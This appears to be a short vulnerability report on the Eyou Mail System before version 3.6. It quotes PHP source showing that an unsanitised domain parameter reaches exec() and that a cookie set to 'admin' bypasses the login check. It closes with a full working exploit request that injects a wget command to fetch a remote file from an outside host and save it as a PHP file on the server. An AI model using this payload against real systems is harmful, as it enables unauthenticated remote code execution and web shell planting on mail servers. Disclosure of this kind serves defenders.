Hi! The Eyou Mail System have a Remote Code Execution in \inc\fuction.php.It affects version below 3.6. The Vulnerability fuction is get_login_ip_config_file in \inc\fuction.php. function get_login_ip_config_file($domain, $file) { $dir = '/var/eyou/Domain/'; $dir_mail = exec('/var/eyou/sbin/hashid '.$domain); //$domain can control by us. .... } the other file in \admin\domain\ip_login_set\d_ip_login_get.php. <?php ... require_once('inc/domain.config.php'); //ValidateAdmin(); //We donn't need to login in. $domainname = get_domain(); //Get cookie&#12288;&#12288; $allow_file = 'web_login_allow_ip'; $deny_file = 'web_login_deny_ip'; $domain = trim(get('domain')); //$domain from here. $type = trim(get('type'));&#12288;&#12288;//Get type $res = ''; if($domainname !== 'admin' && $domainname !== $domain) { //we just need control $cookie=admin can bypass it and go on. echo ''; exit; } if($type === 'allow') {&#12288;//$type any go $file = $allow_file; $res .= 'ip_allow&'; } elseif($type === 'deny') { $file = $deny_file; $res .= 'ip_deny&'; } else { echo ''; exit; } $file = get_login_ip_config_file($domain, $file);// use the vulnerability fuction if($file === FALSE) { echo $res; exit; } Exp: GET /admin/domain/ip_login_set/d_ip_login_get.php?domain=%3Bwget%20http://conqu3r.paxmac.org/exp.txt%3Bcp%20exp.txt%20exp.php&type=allow HTTP/1.1 Host: mail.xxx.com.cn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie:cookie=admin Connection: keep-alive Thanks. conqu3r.zeng